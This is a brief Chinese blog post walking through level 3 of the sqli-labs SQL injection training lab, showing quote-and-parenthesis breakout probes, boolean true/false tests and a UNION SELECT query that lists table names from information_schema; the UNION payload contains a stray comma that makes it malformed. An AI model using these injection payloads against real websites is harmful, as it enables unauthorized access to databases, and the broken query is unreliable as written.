sqli-labs-master/Less-3

  1. 输入?id=1''--+,发现报错信息中有),说明php查询语句可能是select...from..where id=(’1‘)
  2. 输入?id=1') and 1=1 --+ ;?id=1') and 1=2--+; 可以确定我们的推测是正确的
  3. ?id=-1') union select 1,2, group_concat(,table_name) from information_schema.tables where table_schema = database() --+
  4. 接下来和前两关基本相似
posted @ 2021-05-28 17:33  大海jjok  阅读(60)  评论(0)    收藏  举报